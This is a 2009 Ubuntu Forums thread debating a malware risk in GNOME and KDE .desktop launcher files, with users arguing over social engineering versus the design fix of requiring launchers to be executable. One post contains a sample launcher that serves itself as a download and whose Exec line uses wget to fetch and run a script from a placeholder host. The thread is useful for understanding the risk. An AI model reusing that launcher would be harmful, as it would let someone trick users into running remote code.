PDA

View Full Version : [all variants] Malware Threat To GNOME and KDE



deepclutch
February 18th, 2009, 09:19 PM
Blogger "foobar" has written a followup article (http://www.geekzone.co.nz/foobar/6236) on the How to write a Linux virus in 5 easy steps article, which was mentioned on LWN here (http://lwn.net/Articles/318755/). "Yesterday I published an article about How to write a Linux virus in 5 easy steps. There has been quite an overwhelming response for this. Within just a few hours this article became my most visited blog post ever. Wow! Just goes to show that either the article hit a real nerve, or the other articles on my blog are just really boring. :-)"

http://lwn.net/Articles/319072/
--
foobar posted on his blog recently about 'How to write a Linux virus in 5 easy steps (http://www.geekzone.co.nz/foobar/6229),' detailing potential malware infection risks in the .desktop file format used by GNOME and KDE. This is not a new threat, and it appears to still be a risk, as discussions in 2006 (http://archive.netbsd.se/?ml=xorg-xdg&a=2006-03&t=2724527) did not seem to come to any firm conclusion on how to deal with the problem." There's a followup on LWN (http://lwn.net/Articles/319072/).
http://it.slashdot.org/article.pl?sid=09/02/17/1526244

--
People - will they never fix this issue?
ofcourse ,it is NOT a Ubuntu or GNU/Linux Problem.it is with Desktop Environments be it Gnome ,kde ,xfce,lxde .there is no word I hear from gnome mailing list(show me?)
http://archive.netbsd.se/?ml=xorg-xdg&a=2006-03&t=2724527

cariboo907
February 18th, 2009, 09:40 PM
There is nothing to fix, the malware in the article depends on social engineering, and I don't think that the devs can fix stupidity.

Jim

W2IBC
February 18th, 2009, 09:48 PM
There is nothing to fix, the malware in the article depends on social engineering, and I don't think that the devs can fix stupidity.

Jim

just like that one comedian Ron White said "You can't fix stupid"

I think MOST Linux users know enough to keep themselves from getting so called "owned"

deepclutch
February 18th, 2009, 09:51 PM
social engineering?huh?remember - Linux ,with Ubuntu is tauting as idiot friendly;right?some effort?if ever some thing like apparmour comes useful in problem like this.

sonofusion82
February 18th, 2009, 09:54 PM
just like that one comedian Ron White said "You can't fix stupid"

I think MOST Linux users know enough to keep themselves from getting so called "owned"

while I agree that most linux users are more well informed, this is not the attitude we need if we want spread linux and increase its install base. if I install ubuntu in my mum's machine, i would expect it to be safe enough for her to use without the need to give her an extensive computer security briefing.:popcorn:

Therion
February 18th, 2009, 10:01 PM
As long as people interface with computers there will be vulnerabilities. Period. Full stop. End of discussion.

No Operating System that yet exists can replace the one between your ears that implements, or fails to implement, basic safe-computing habits.

cdenley
February 18th, 2009, 10:26 PM
I think gnome and KDE should require launchers to be executable before it executes any commands in it. This way, even if the user downloaded a malicious launcher, it wouldn't do anything until the user made it executable, just as if it were a script. This way, the user knows that double-clicking a file they download will not execute anything, unless they make it executable, as many users may incorrectly assume at the moment.

By the way, if you don't want to read the entire article, here is a summary:


<?php
header("Content-Type: application/octet-stream");
header('Content-Disposition: attachment; filename="innocent"');
?>
[Desktop Entry]
Version=1.0
Encoding=UTF-8
Name=malware
Type=Application
Terminal=false
Icon[en_US]=gnome-panel-launcher
Exec=bash -c "wget -O ~/.malware.sh http://badsite.com/malware.sh;sh ~/.malware.sh"
Name[en_US]=malware
Icon=gnome-panel-launcher

sonofusion82
February 18th, 2009, 10:48 PM
As long as people interface with computers there will be vulnerabilities. Period. Full stop. End of discussion.

No Operating System that yet exists can replace the one between your ears that implements, or fails to implement, basic safe-computing habits.

the idea is to reduce mistakes. even computer security experts may occasional make mistakes.

if you depend purely on your "safe-computing habits", why not just run entire desktop Linux with just root account and tell everyone to just practice safe-computing habits.

it is like telling everyone not to do crime because it is bad and just practise personal safety habit and forget about police and law enforcement. it just doesn't work.

to quote Einstein, "Two things are infinite: the universe and human stupidity; and I'm not sure about the universe." ;)

cdenley
February 18th, 2009, 10:49 PM
I didn't vote because there is no option to indicate "not a serious threat, but can be improved".

http://brainstorm.ubuntu.com/idea/18130/image/1/ (http://brainstorm.ubuntu.com/idea/18130/)

doas777
February 18th, 2009, 10:54 PM
as everyone on /. pointed out, the real problem is not that the user is 'stupid', but that .desktop files are executable even when set to -x . To me, that is a problem that should be addressed.

now, which sounds stupider, a user opening an attachment, or a developer knowing full well, but refusing to honor the longstanding conventions in relation to file system security?

Therion
February 18th, 2009, 10:55 PM
the idea is to reduce mistakes.
Where exactly is the coding mistake in this instance?

The article itself states:
...there is nothing fundamental about the architecture of Linux that prevents user stupidity or ignorance, which is of course the main ingredient in any attack vector like this.
Furthermore...
There is just one small stumbling block, which needs to be overcome. Well, two, actually.
Finally...
And here then is one more step that needs to be taken by the user, which might reduce the success rate of this attack vector a little. The user has to first save the attachment and then double click on it.

This isn't a coding issue; this PEBCAK: Problem Exists Between Chair And Keyboard. Remove any single user error, and there's plenty to choose from it seems, and this attack fails.

Utterly... FAILS.

matteojg
February 18th, 2009, 11:15 PM
Granted the premise concerning the vulnerability of launchers in the KDE or GNOME desktops...how is it that the script that is downloaded by the launcher becomes executable?

cdenley
February 18th, 2009, 11:29 PM
Granted the premise concerning the vulnerability of launchers in the KDE or GNOME desktops...how is it that the script that is downloaded by the launcher becomes executable?

It doesn't need to be executable if you execute the shell directly with the script as an argument.

bodhi.zazen
February 19th, 2009, 12:28 AM
I am going to close this thread now as it is not a very productive discussion. The previous discussion was closed, and that does not mean you may start a new one.

Please see the sticky on the top of these forums and please do not spam these forums with links to personal web pages.

If you wish to cite an authority on security that would be fine, but the author of those pages is certainly not an authority and your linking to his blog / opinion page borders on spam.

The sticky address both issues you raise :

1. Social engineering => educate users.

2. Escalation of privileges. This requires #1 and you are already in deep trouble if you are limiting escalation of privileges. The current tools to allow this are apparmor and selinux, both of which are quite powerful.